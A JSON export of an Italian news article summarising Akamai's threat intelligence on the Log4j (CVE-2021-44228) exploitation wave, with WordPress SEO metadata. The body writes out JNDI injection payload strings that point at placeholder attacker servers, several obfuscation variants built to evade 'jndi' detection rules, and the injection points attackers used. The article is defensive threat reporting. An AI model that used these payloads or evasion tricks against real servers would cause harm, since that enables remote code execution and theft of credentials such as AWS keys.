{"id":5799,"date":"2021-12-27T16:16:22","date_gmt":"2021-12-27T15:16:22","guid":{"rendered":"https:\/\/www.bitmat.it\/specialesicurezza\/?p=5799"},"modified":"2021-12-27T16:16:22","modified_gmt":"2021-12-27T15:16:22","slug":"log4j-cve-lanalisi-threat-intelligence-di-akamai","status":"publish","type":"post","link":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai","title":{"rendered":"Log4j CVE: l\u2019analisi Threat Intelligence di Akamai"},"content":{"rendered":"<p><a href=\"https:\/\/www.akamai.com\/it\" target=\"_blank\" rel=\"noopener\"><strong>Akamai\u00a0Technologies<\/strong><\/a> sta continuando ad\u00a0<strong>analizzare la\u00a0<\/strong><a href=\"https:\/\/www.akamai.com\/blog\/security\/akamai-recommendations-for-log4j-mitigation\" target=\"_blank\" rel=\"noopener\"><strong>vulnerabilit\u00e0 critica CVE-2021-44228<\/strong><\/a>\u00a0rivelata in <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/\" target=\"_blank\" rel=\"noopener\">Log4j<\/a>, per offrire<strong>\u00a0chiare raccomandazioni su come dotarsi di una protezione extra<\/strong>, che vada\u00a0<strong>oltre le semplici patch<\/strong>\u00a0di sicurezza. La rete di Akamai consente di visualizzare\u00a0<strong>il traffico di 1,3 miliardi di dispositivi unici al giorno, con un traffico record di 182 Tbps<\/strong>. Il team di ricerca delle minacce di Akamai ha quindi indagato questo traffico per approfondire la quantit\u00e0 di tentativi volti a sfruttare la vulnerabilit\u00e0 e le modalit\u00e0 di exploit e condividere insight utili sia ai threat hunter che ai team di sicurezza.<\/p>\n<p>Innanzitutto:<\/p>\n<ul>\n<li><strong>C\u2019\u00e8 da aspettarsi che questa vulnerabilit\u00e0 Log4j abbia una lunga coda di attacco.<\/strong>\u00a0Akamai prevede che, a causa dell\u2019ampio utilizzo di questo software e del gran numero di varianti di exploit, continueremo a vedere tentativi di exploit per diversi mesi a venire ed \u00e8 altamente probabile che molte violazioni vengano scoperte in futuro. La prima raccomandazione, quindi, \u00e8 sicuramente quella di implementare una patch urgente.<\/li>\n<li><strong>I cyber criminali hanno utilizzato injection opportunistiche e i loro attacchi sono diventati pi\u00f9 mirati<\/strong>. Oltre a variare gli exploit, gli aggressori hanno cercato di identificare qualsiasi punto di injection disponibile. Sebbene abbiano iniziato dai punti di ingresso \u201copportunistici\u201d pi\u00f9 ovvi, come lo user agent, si sono messi rapidamente alla ricerca dei parametri specifici dell&#8217;organizzazione target. Questo tipo di intelligence \u00e8 molto utile per i difensori del web, perch\u00e9 possano adattarsi rapidamente al panorama delle minacce in evoluzione.<\/li>\n<li><strong>Le conseguenze della fase di ricognizione potrebbero non essere pienamente comprese per mesi.<\/strong> La maggior parte dell&#8217;attivit\u00e0 osservata era di ricognizione\/test, rispetto a una percentuale relativamente minore di attacchi effettivi. Se gli attacchi possono essere mitigati da patch e altri metodi, non \u00e8 chiaro quindi quante violazioni siano realmente avvenute durante questo periodo e quale ne sia stata la portata.<\/li>\n<\/ul>\n<p>Di seguito i risultati dell\u2019analisi di Akamai nel dettaglio.<\/p>\n<h3>1.\u00a0 \u00a0 \u00a0 Log4j, un inizio lento, poi uno tsunami globale di attivit\u00e0 dannose<\/h3>\n<p>C&#8217;\u00e8 voluto un po&#8217; di tempo perch\u00e9 i tentativi di sfruttamento della vulnerabilit\u00e0 rivolti ai clienti Akamai crescessero, ma una volta aumentati, sono stati lanciati in ondate massicce una dopo l\u2019altra. Questo sarebbe in linea con gli altri risultati, secondo cui, appena gli aggressori hanno scoperto pi\u00f9 vettori di attacco, hanno sfruttato le varianti, portando il volume di attivit\u00e0 malevole ad aumentare drasticamente.<\/p>\n<p>Come per altri attacchi zero-day, gli autori sono stati molto veloci ad adottare questo exploit ed espandere il loro arsenale di attacchi. Dai nostri dati possiamo affermare che\u00a0<strong>circa il 57% dell&#8217;infrastruttura di attacco che inviava exploit Log4j era gi\u00e0 nota ad Akamai da attacchi precedenti\u00a0<\/strong>&#8211; essenzialmente, lo tsunami \u00e8 stato provocato tanto da attori malevoli gi\u00e0 esistenti che hanno colto l\u2019opportunit\u00e0, quanto da nuovi aggressori.<\/p>\n<p>L&#8217;ondata di attacchi si \u00e8 verificata a livello globale, con una prima ondata proveniente da Stati Uniti, Singapore, Germania e Brasile, ma le geografie erano altamente distribuite e alcuni attacchi sono partiti da server ospitati da popolari cloud provider, come AWS e DigitalOcean. Inoltre, le geografie degli IP in attacco sono sempre in movimento: il 15 dicembre, le analisi di Akamai hanno localizzato le macchine rogue che avevano inviato la maggior parte degli attacchi Log4j in Canada, Russia, Lussemburgo e Regno Unito.<\/p>\n<p><strong>Il commercio ha dominato i verticali del settore<\/strong>.\u00a0<strong>Oltre il 50% dei clienti di app security<\/strong>\u00a0di Akamai ha visto\u00a0<strong>tentativi di exploit in una sola ora<\/strong>.<\/p>\n<p><strong>L\u2019Italia \u00e8 la quarta nazione pi\u00f9 colpita<\/strong>, dopo USA, Regno Unito e Canada.<\/p>\n<h3>2.\u00a0 \u00a0 \u00a0 \u00a0 Log4j: mutazioni di exploit senza precedenti<\/h3>\n<p>Oltre all&#8217;enorme impatto di questa vulnerabilit\u00e0, abbiamo notato\u00a0<strong>un&#8217;evoluzione senza precedenti delle varianti di exploit<\/strong>.<\/p>\n<p>Mentre il vettore di attacco iniziale suggerito nell&#8217;exploit proof-of-concept era\u00a0<em>${jndi:ldap:\/\/malicious_server_address\/}<\/em>, sono emerse immediatamente altre tecniche di evasione dirette, come i\u00a0<strong>payload URL-encoded<\/strong>:\u00a0<em>$%7Bjndi:ldap:\/x.x.x.x:3339\/Exploit%7D<\/em>. Nel giro di poche ore, gli aggressori hanno iniziato a provare altri fornitori di servizi di registro JNDI come &#8220;rmi&#8221; e &#8220;dns&#8221; per eludere i rilevamenti che cercavano specificamente &#8220;ldap&#8221;, che sono stati suggeriti come:\u00a0<em>${jndi:rmi:\/\/<\/em>\u00a0e\u00a0<em>${jndi:dns:\/\/<br \/>\n<\/em><\/p>\n<p>La documentazione esistente dei lookup di Log4j 2 aiuta a capire la superficie di attacco e il potenziale di evasione. Attaccanti e ricercatori stavano cercando di utilizzare una qualsiasi delle direttive di lookup per\u00a0<strong>creare una variante di attacco offuscata che non includesse &#8220;jndi&#8221; &#8211; una stringa che la maggior parte dei difensori stava ricercando nelle proprie regole di rilevamento<\/strong>.<\/p>\n<p>Poich\u00e9 Log4j \u00e8 insensibile alle maiuscole e alle minuscole, all&#8217;inizio sono state usate le direttive di trasformazione dei caratteri pi\u00f9 banali &#8211; &#8220;lower&#8221; e &#8220;upper&#8221;:\u00a0<em>${${lower:j}ndi:<\/em>\u00a0\u00a0and\u00a0<em>${${upper:j}ndi:<\/em>\u00a0Fornendo qualsiasi lunghezza di stringa alla funzione di ricerca, non solo un singolo carattere,\u00a0 funzioner\u00e0:\u00a0<em>${${lower:jnd}i:<\/em>\u00a0Abbastanza immediatamente, gli avversari hanno scoperto che \u00e8 possibile definire una variabile utente e impostarla con un valore predefinito utilizzando un segno &#8220;-&#8220;, che avr\u00e0 come risultato la restituzione di questo valore predefinito dopo la definizione. Questo fornisce un altro trucco per offuscare le stringhe &#8220;jndi&#8221; e &#8220;ldap&#8221;:\u00a0<em>${${x:-j}ndi:<\/em>\u00a0 Apparentemente, il framework Log4j non richiede nemmeno di fornire un nome a una variabile, quindi le varianti di exploit hanno iniziato a includere quei nomi di variabili &#8220;vuoti&#8221;, e anche variabili con profondit\u00e0 multiple:\u00a0<em>${${:-j}ndi:<\/em>\u00a0e\u00a0<em>${${::::::-j}ndi:\u00a0<\/em>Alcune varianti hanno iniziato ad usare altre direttive utente come &#8220;env&#8221; per definire nuove variabili ambientali, e &#8220;date&#8221;, che sorprendentemente non impone alcun formato di data:\u00a0<em>${${env:BARFOO:-j}ndi<\/em>\u00a0e\u00a0<em>${${date:&#8217;j&#8217;}${date:&#8217;n&#8217;}${date:&#8217;d&#8217;}${date:&#8217;i&#8217;}:ldap:\/\/127.0.0.1:3339\/Exploit}<\/p>\n<p><\/em>Varianti pi\u00f9 avanzate, arrivate nei giorni successivi al lancio dell&#8217;exploit massivo, hanno incluso anche\u00a0<strong>un&#8217;evasione di stringhe &#8220;vuote&#8221;.\u00a0<\/strong>Gli attaccanti stavano cercando un metodo di ricerca e un&#8217;espressione che, quando valutata, potesse risultare in una stringa &#8220;vuota&#8221;, il che significa che questa espressione poteva essere iniettata tra qualsiasi carattere come:\u00a0<em>${:-}<\/em>\u00a0Altre ancora, pi\u00f9 avanzate della stringa &#8220;vuota&#8221;, si basavano su impostazioni specifiche del sistema e iniettavano cose come:\u00a0<em>${{sys:sun.cpu.isalist}jnd${sys:sun.cpu.isalist}i<\/em>\u00a0E sono state tentate anche molte altre varianti tra cui\u00a0<strong>doppio url codificato, unicode, ed espressioni senza la parentesi di chiusura &#8220;}&#8221;<\/strong><\/p>\n<p>\u00c8 importante notare che gli attaccanti hanno provato anche\u00a0<strong>diverse varianti di attacco non funzionanti<\/strong>, come:\u00a0<em>$jndi:ldap:\/\/<br \/>\n<\/em><\/p>\n<h3>3.\u00a0 \u00a0 \u00a0Multipli punti di ingresso: da attacchi opportunistici a mirati<\/h3>\n<p><strong>La ricerca di Akamai ha scoperto che gli aggressori hanno iniettato il payload dell&#8217;exploit in pi\u00f9 punti di ingresso.<\/strong>\u00a0Il luogo pi\u00f9 comune in cui l&#8217;exploit \u00e8 stato iniettato \u00e8\u00a0<strong>l&#8217;argomento Query String<\/strong>,\u00a0<strong>l&#8217;intestazione User-Agent<\/strong>\u00a0(come nell&#8217;exploit originale proof-of-concept), e\u00a0<strong>il<\/strong>\u00a0<strong>percorso della richiesta<\/strong>, partendo dal presupposto che i server web e le applicazioni avrebbero registrato le informazioni di \u201caccesso\u201d.<\/p>\n<p>Nella maggior parte degli attacchi, l\u2019injection \u00e8 avvenuta tramite diversi parametri di query fittizi come &#8220;x&#8221;, &#8220;test&#8221; e &#8220;foo&#8221;. Sono stati inoltre utilizzati altri parametri di query come &#8220;url&#8221;, &#8220;nextUrl&#8221;, &#8220;_csrfToken&#8221;, &#8220;_endcoding&#8221; e &#8220;openid.retrun_to&#8221;, stimando che fosse altamente probabile che quei parametri venissero registrati. Ogni intestazione immaginabile \u00e8 stata un obiettivo per l&#8217;iniezione, compresi Cookie, Referer, X-Forwarded-For e Connection. Molti degli attaccanti hanno inviato richieste iniettando l&#8217;exploit in pi\u00f9 punti della stessa richiesta.<\/p>\n<h3><strong>4.\u00a0 \u00a0 \u00a0 L&#8217;analisi del payload mostra l&#8217;uso di blind reconnaissance, dropping malware e strumenti di post exploitation<\/strong><\/h3>\n<p>La maggior parte degli attori delle minacce sta applicando la\u00a0<strong>tecnica della \u201cblind\u201d reconnaissance (ricognizione cieca) utilizzando i servizi online pi\u00f9 popolari per il rilevamento dell&#8217;interazione dei servizi esterni.\u00a0<\/strong>Per confermare alcune vulnerabilit\u00e0, l&#8217;attaccante non \u00e8 in grado di ottenere una risposta diretta dal servizio mirato. In questi casi, la tecnica per testare se il sito web \u00e8 vulnerabile sar\u00e0 cercare di eseguire del codice per contattare un server esterno sotto il controllo dell&#8217;attaccante in ascolto di tali connessioni. Se il server dell&#8217;attaccante riceve un &#8220;beacon&#8221; da un certo server, significa che questo server ha eseguito con successo il codice dell&#8217;attaccante. Invece di impostare e mantenere un tale server, la maggior parte degli aggressori ha preferito utilizzare i pi\u00f9 popolari setup online proprio per questo.<\/p>\n<p>I servizi pi\u00f9 popolari utilizzati nell&#8217;attacco Log4j sono stati &#8220;ineract.sh&#8221;, &#8220;burpcollaborator.net&#8221; e &#8220;canarytokens.com&#8221;, tuttavia ne sono stati usati anche altri, molti dei quali ospitavano un deployment del server di interazione out-of-band open-source &#8220;Ineractsh&#8221;.<\/p>\n<p>Oltre al beacon di blind reconnaissance, molti degli attaccanti stavano gi\u00e0 cercando di esfiltrare dati utili come l&#8217;hostname della macchina, dati ambientali come java:os, java:vm, env:user &#8211; anche estraendo le chiavi AWS per facilitare il take over dell&#8217;account AWS.<\/p>\n<p>Sono stati utilizzati anche servizi di tunnel inversi come &#8220;ngrok.io&#8221; per nascondere le identit\u00e0 degli attaccanti o scaricare una backdoor. Il vantaggio di questi servizi \u00e8 che gli aggressori non hanno bisogno di ospitare il malware sul proprio server pubblico, che potrebbe essere chiuso o sequestrato dalle autorit\u00e0. In questo caso,\u00a0<strong>un aggressore ospita il malware e il pannello di comando e controllo sulla propria macchina, e si nasconde dietro un servizio di tunneling legittimo<\/strong>, mentre questo servizio \u201ctrasferisce\u201d il traffico C2 dalla macchina della vittima alla macchina dell&#8217;aggressore.<\/p>\n<p>Oltre agli attori delle minacce che implementano cryptominer e bot DDoS, Akamai ha identificato\u00a0<strong>alcuni attaccanti aggressivi che eseguono un enorme volume di scansioni, prendendo di mira le macchine Windows<\/strong>. Gli aggressori stavano cercando di distribuire la famigerata\u00a0<strong>backdoor &#8220;netcat&#8221;<\/strong>, un noto strumento di escalation dei privilegi di Windows, che \u00e8 comunemente utilizzato per il successivo movimento laterale o per ottenere i privilegi per crittografare il disco e portare a termine un attacco ransomware. Tuttavia, degli attacchi complessivi osservati da Akamai fino ad oggi, solo una piccola percentuale sembra essere legata al ransomware.<\/p>\n<p>Akamai non si ferma qui.\u00a0I team di threat intelligence, ricerca sulla sicurezza e risposta agli incidenti di Akamai continuano a monitorare e proteggere l\u2019infrastruttura e i clienti Akamai, sfruttando visibilit\u00e0 e intelligence proprietarie. Il 17 dicembre, Hideki Okamoto di Akamai ha trovato e segnalato\u00a0<a href=\"https:\/\/www.akamai.com\/blog\/security\/akamai-reports-another-dos-inlog4j2\" target=\"_blank\" rel=\"noopener\">un&#8217;ulteriore vulnerabilit\u00e0 denial-of-service (DoS)<\/a>, che \u00e8 stata assegnata come CVE-2021-45105.<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Circa il 57% dell&#8217;infrastruttura di attacco che inviava exploit Log4j era gi\u00e0 nota ad Akamai. L\u2019Italia \u00e8 la quarta nazione pi\u00f9 colpita<\/p>\n","protected":false},"author":1,"featured_media":5801,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[7],"tags":[4062,4902,4320],"class_list":{"0":"post-5799","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-attualita","8":"tag-akamai","9":"tag-log4j","10":"tag-threat-intelligence"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.3 (Yoast SEO v27.4) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Log4j CVE: l\u2019analisi Threat Intelligence di Akamai - BitMAT | Speciale Sicurezza 360x365<\/title>\n<meta name=\"description\" content=\"Circa il 57% dell&#039;infrastruttura di attacco che inviava exploit Log4j era gi\u00e0 nota ad Akamai. L\u2019Italia \u00e8 la quarta nazione pi\u00f9 colpita\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Log4j CVE: l\u2019analisi Threat Intelligence di Akamai\" \/>\n<meta property=\"og:description\" content=\"Circa il 57% dell&#039;infrastruttura di attacco che inviava exploit Log4j era gi\u00e0 nota ad Akamai. L\u2019Italia \u00e8 la quarta nazione pi\u00f9 colpita\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai\" \/>\n<meta property=\"og:site_name\" content=\"BitMAT | Speciale Sicurezza 360x365\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/BitMATnews\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-27T15:16:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.bitmat.it\/specialesicurezza\/files\/2021\/12\/Log4j_Akamai.png\" \/>\n\t<meta property=\"og:image:width\" content=\"672\" \/>\n\t<meta property=\"og:image:height\" content=\"378\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Redazione BitMAT\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/BitMATnews\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Redazione BitMAT\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai\"},\"author\":{\"name\":\"Redazione BitMAT\",\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/#\\\/schema\\\/person\\\/4cd1e4627f78f4fbed810748dc1a20d4\"},\"headline\":\"Log4j CVE: l\u2019analisi Threat Intelligence di Akamai\",\"datePublished\":\"2021-12-27T15:16:22+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai\"},\"wordCount\":1662,\"image\":{\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/files\\\/2021\\\/12\\\/Log4j_Akamai.png\",\"keywords\":[\"Akamai\",\"Log4j\",\"Threat Intelligence\"],\"articleSection\":[\"Attualit\u00e0\"],\"inLanguage\":\"it-IT\",\"copyrightYear\":\"2021\",\"copyrightHolder\":{\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/#organization\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai\",\"url\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai\",\"name\":\"Log4j CVE: l\u2019analisi Threat Intelligence di Akamai - BitMAT | Speciale Sicurezza 360x365\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/files\\\/2021\\\/12\\\/Log4j_Akamai.png\",\"datePublished\":\"2021-12-27T15:16:22+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/#\\\/schema\\\/person\\\/4cd1e4627f78f4fbed810748dc1a20d4\"},\"description\":\"Circa il 57% dell'infrastruttura di attacco che inviava exploit Log4j era gi\u00e0 nota ad Akamai. L\u2019Italia \u00e8 la quarta nazione pi\u00f9 colpita\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai#primaryimage\",\"url\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/files\\\/2021\\\/12\\\/Log4j_Akamai.png\",\"contentUrl\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/files\\\/2021\\\/12\\\/Log4j_Akamai.png\",\"width\":672,\"height\":378},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/5799\\\/log4j-cve-lanalisi-threat-intelligence-di-akamai#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Log4j CVE: l\u2019analisi Threat Intelligence di Akamai\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/#website\",\"url\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/\",\"name\":\"BitMAT | Speciale Sicurezza 360x365\",\"description\":\"Un intero speciale dedicato esclusivamente alla sicurezza, in tutte le sue accezioni: dalla protezione dei singoli device a quella delle infrastrutture critiche, senza trascurare gli attacchi terroristici e la violazione alla privacy.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/#\\\/schema\\\/person\\\/4cd1e4627f78f4fbed810748dc1a20d4\",\"name\":\"Redazione BitMAT\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/cc68cb64f5606ebc4c95ec5b02440c57fc7d268268e5dd8c1cac7ec09ec07ac9?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/cc68cb64f5606ebc4c95ec5b02440c57fc7d268268e5dd8c1cac7ec09ec07ac9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/cc68cb64f5606ebc4c95ec5b02440c57fc7d268268e5dd8c1cac7ec09ec07ac9?s=96&d=mm&r=g\",\"caption\":\"Redazione BitMAT\"},\"description\":\"BitMAT Edizioni \u00e8 una casa editrice che ha sede a Milano con una copertura a 360\u00b0 per quanto riguarda la comunicazione rivolta agli specialisti dell'lnformation &amp; Communication Technology.\",\"sameAs\":[\"https:\\\/\\\/www.bitmat.it\\\/\",\"https:\\\/\\\/www.facebook.com\\\/BitMATnews\",\"https:\\\/\\\/x.com\\\/https:\\\/\\\/twitter.com\\\/BitMATnews\"],\"url\":\"https:\\\/\\\/www.bitmat.it\\\/specialesicurezza\\\/news\\\/author\\\/bitmat\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Log4j CVE: l\u2019analisi Threat Intelligence di Akamai - BitMAT | Speciale Sicurezza 360x365","description":"Circa il 57% dell'infrastruttura di attacco che inviava exploit Log4j era gi\u00e0 nota ad Akamai. L\u2019Italia \u00e8 la quarta nazione pi\u00f9 colpita","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai","og_locale":"it_IT","og_type":"article","og_title":"Log4j CVE: l\u2019analisi Threat Intelligence di Akamai","og_description":"Circa il 57% dell'infrastruttura di attacco che inviava exploit Log4j era gi\u00e0 nota ad Akamai. L\u2019Italia \u00e8 la quarta nazione pi\u00f9 colpita","og_url":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai","og_site_name":"BitMAT | Speciale Sicurezza 360x365","article_author":"https:\/\/www.facebook.com\/BitMATnews","article_published_time":"2021-12-27T15:16:22+00:00","og_image":[{"width":672,"height":378,"url":"https:\/\/www.bitmat.it\/specialesicurezza\/files\/2021\/12\/Log4j_Akamai.png","type":"image\/png"}],"author":"Redazione BitMAT","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/BitMATnews","twitter_misc":{"Scritto da":"Redazione BitMAT","Tempo di lettura stimato":"7 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai#article","isPartOf":{"@id":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai"},"author":{"name":"Redazione BitMAT","@id":"https:\/\/www.bitmat.it\/specialesicurezza\/#\/schema\/person\/4cd1e4627f78f4fbed810748dc1a20d4"},"headline":"Log4j CVE: l\u2019analisi Threat Intelligence di Akamai","datePublished":"2021-12-27T15:16:22+00:00","mainEntityOfPage":{"@id":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai"},"wordCount":1662,"image":{"@id":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai#primaryimage"},"thumbnailUrl":"https:\/\/www.bitmat.it\/specialesicurezza\/files\/2021\/12\/Log4j_Akamai.png","keywords":["Akamai","Log4j","Threat Intelligence"],"articleSection":["Attualit\u00e0"],"inLanguage":"it-IT","copyrightYear":"2021","copyrightHolder":{"@id":"https:\/\/www.bitmat.it\/#organization"}},{"@type":"WebPage","@id":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai","url":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai","name":"Log4j CVE: l\u2019analisi Threat Intelligence di Akamai - BitMAT | Speciale Sicurezza 360x365","isPartOf":{"@id":"https:\/\/www.bitmat.it\/specialesicurezza\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai#primaryimage"},"image":{"@id":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai#primaryimage"},"thumbnailUrl":"https:\/\/www.bitmat.it\/specialesicurezza\/files\/2021\/12\/Log4j_Akamai.png","datePublished":"2021-12-27T15:16:22+00:00","author":{"@id":"https:\/\/www.bitmat.it\/specialesicurezza\/#\/schema\/person\/4cd1e4627f78f4fbed810748dc1a20d4"},"description":"Circa il 57% dell'infrastruttura di attacco che inviava exploit Log4j era gi\u00e0 nota ad Akamai. L\u2019Italia \u00e8 la quarta nazione pi\u00f9 colpita","breadcrumb":{"@id":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai#primaryimage","url":"https:\/\/www.bitmat.it\/specialesicurezza\/files\/2021\/12\/Log4j_Akamai.png","contentUrl":"https:\/\/www.bitmat.it\/specialesicurezza\/files\/2021\/12\/Log4j_Akamai.png","width":672,"height":378},{"@type":"BreadcrumbList","@id":"https:\/\/www.bitmat.it\/specialesicurezza\/news\/5799\/log4j-cve-lanalisi-threat-intelligence-di-akamai#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.bitmat.it\/specialesicurezza\/"},{"@type":"ListItem","position":2,"name":"Log4j CVE: l\u2019analisi Threat Intelligence di Akamai"}]},{"@type":"WebSite","@id":"https:\/\/www.bitmat.it\/specialesicurezza\/#website","url":"https:\/\/www.bitmat.it\/specialesicurezza\/","name":"BitMAT | Speciale Sicurezza 360x365","description":"Un intero speciale dedicato esclusivamente alla sicurezza, in tutte le sue accezioni: dalla protezione dei singoli device a quella delle infrastrutture critiche, senza trascurare gli attacchi terroristici e la violazione alla 